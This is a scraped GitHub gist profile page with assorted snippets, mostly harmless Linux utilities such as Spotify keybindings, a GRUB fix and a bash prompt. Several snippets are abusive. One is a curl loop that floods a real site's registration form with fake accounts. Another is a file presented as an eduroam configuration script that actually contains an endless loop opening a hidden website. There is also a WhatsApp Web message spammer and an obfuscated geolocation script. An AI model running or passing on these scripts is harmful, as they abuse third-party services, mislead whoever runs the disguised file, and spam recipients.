Skip to content

Instantly share code, notes, and snippets.

View KeizerDev's full-sized avatar

Robert-Jan Keizer KeizerDev

View GitHub Profile
var _0x2c91=['0x7','push','shift','country','#na','0x6','0x1','0x4','0x3','https://ipinfo.io','jsonp','#de','0x5','0x2','0x0'];(function(_0x160aa6,_0x4ffd23){var _0x2dc78d=function(_0x91438a){while(--_0x91438a){_0x160aa6['push'](_0x160aa6['shift']());}};_0x2dc78d(++_0x4ffd23);}(_0x2c91,0xad));var _0x4bf2=function(_0x160aa6,_0x4ffd23){_0x160aa6=_0x160aa6-0x0;var _0x2dc78d=_0x2c91[_0x160aa6];return _0x2dc78d;};var _0x20f5=['get',_0x4bf2('0x6'),_0x4bf2('0xd'),_0x4bf2('0x9'),'show',_0x4bf2('0x0'),_0x4bf2('0xb'),_0x4bf2('0xe'),_0x4bf2('0x2')];(function(_0x5dc2ee,_0x53ccf){var _0x1e8fea=function(_0x3a5152){while(--_0x3a5152){_0x5dc2ee[_0x4bf2('0x8')](_0x5dc2ee[_0x4bf2('0x9')]());}};_0x1e8fea(++_0x53ccf);}(_0x20f5,0x108));var _0x3a05=function(_0x37fb16,_0x55d538){_0x37fb16=_0x37fb16-0x0;var _0x36542c=_0x20f5[_0x37fb16];return _0x36542c;};var _0x3a59=[_0x3a05(_0x4bf2('0x0')),_0x3a05('0x1'),_0x4bf2('0x3'),_0x3a05(_0x4bf2('0xc')),_0x4bf2('0x1'),_0x3a05('0x5')];(function(_0x57da1d,_0x7bf723){var _0x2d7fd3=function(_0x51
while true; do
NEW_UUID=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1)
echo "firstname=$NEW_UUID&middlename=dfsaf&lastname=sdfsf&date_of_birth=1998-12-23&address=$NEW_UUID&city=$NEW_UUID&zipcode=dfasfds&email=$NEW_UUID%40gmail.com&password=$NEW_UUID&check=edit"
curl 'http://bennos.nl/register' -H 'Pragma: no-cache' -H 'Origin: http://bennos.nl' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9,nl;q=0.8' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Referer: http://bennos.nl/register' --data "firstname=$NEW_UUID&middlename=dfsaf&lastname=sdfsf&date_of_birth=1998-12-23&address=$NEW_UUID&city=$NEW_UUID&zipcode=dfasfds&email=$NEW_UUID%40gmail.com&password=$NEW_UUID&check=edit" --compressed
done;
#!/usr/bin/env python
### config_eduroam.py door Marco van den Boogaard
### Configureer WPA supplicant voor eduroam @HU
### Door de zeer specifieke instellingen van eduroam binnen de HU gaat
### dit handmatig vaak fout
### Het drie keer openen van het bestand is niet heel efficient, maar
### een bewuste keuze aangezien het bestand op die manier ook geheel
### ongemoeid gelaten kan worden.
### laatste wijziging: 10 juli 2017
site='dsaiksasaksaesaomasas.sansal';
while true; do; open ${site//sa}; done;
@KeizerDev
KeizerDev / spotify_keybindings
Created May 11, 2016 21:35 — forked from jbonney/spotify_keybindings
Spotify - Linux key bindings. From XFCE / Ubuntu keyboard shortcuts configuration, assign the control command to their key. http://shkspr.mobi/blog/2011/12/linux-spotify-keybindings/
"dbus-send --print-reply --dest=org.mpris.MediaPlayer2.spotify /org/mpris/MediaPlayer2 org.mpris.MediaPlayer2.Player.PlayPause" XF86AudioPlay
"dbus-send --print-reply --dest=org.mpris.MediaPlayer2.spotify /org/mpris/MediaPlayer2 org.mpris.MediaPlayer2.Player.Stop" XF86AudioStop
"dbus-send --print-reply --dest=org.mpris.MediaPlayer2.spotify /org/mpris/MediaPlayer2 org.mpris.MediaPlayer2.Player.Next" XF86AudioNext
"dbus-send --print-reply --dest=org.mpris.MediaPlayer2.spotify /org/mpris/MediaPlayer2 org.mpris.MediaPlayer2.Player.Previous" XF86AudioPrevious
@KeizerDev
KeizerDev / grub
Created May 10, 2016 08:25
Kernel params for making the trackpad work on the Lenovo Thinkpad E460
i8042.reset i8042.nomux i8042.nopnp i8042.noloop
@KeizerDev
KeizerDev / rhythmbox-chromecast.sh
Last active June 22, 2019 17:08
A simple install script for the Rhythmbox Chromecast extension
#!/bin/bash
cd ~/.local/share/rhythmbox/plugins/ && git clone https://github.com/KeizerDev/Rhythmbox-Chromecast.git chromecast && cd chromecast/ && pip install -r requirements.txt
@KeizerDev
KeizerDev / spotify2youtubedownload.py
Created February 3, 2016 22:50
spotify2youtubedownload
#!/usr/bin/python
#title :spotify_downloader.py
#description :This script download music playing on spotify (Linux) from youtube.
#source :https://github.com/xfilipe/spotify-music-downloader
#author :xfilipe
#date :20160203
#version :0.1.1
#usage :python spotify_downloader.py
#python_version :2.7.6
#==============================================================================
@KeizerDev
KeizerDev / index.js
Created November 30, 2015 15:31
web.whatsapp.com spammer
/* User config */
var msgcount = 50;
var delay = 20;
var emojiTab = 3; /* Categorie */
var emojiNumber = 8; /* Nummer van emoji */
/* Script */
function getElementByXpath(path) { return document.evaluate(path, document, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null).singleNodeValue; }
var winnniey = 0;
@KeizerDev
KeizerDev / bash version of Steve Losh's zsh prompt
Created March 30, 2015 11:11
bash version of Steve Losh's zsh prompt
### PS1 SETTINGS =======================================================
# show more git info in PS1
export GIT_PS1_SHOWDIRTYSTATE=true
export GIT_PS1_SHOWUNTRACKEDFILES=true
export GIT_PS1_SHOWSTASHSTATE=true
# colors
export PS1_GREY="\[$(tput bold; tput setaf 0)\]"
export PS1_GREEN="\[$(tput bold; tput setaf 2)\]"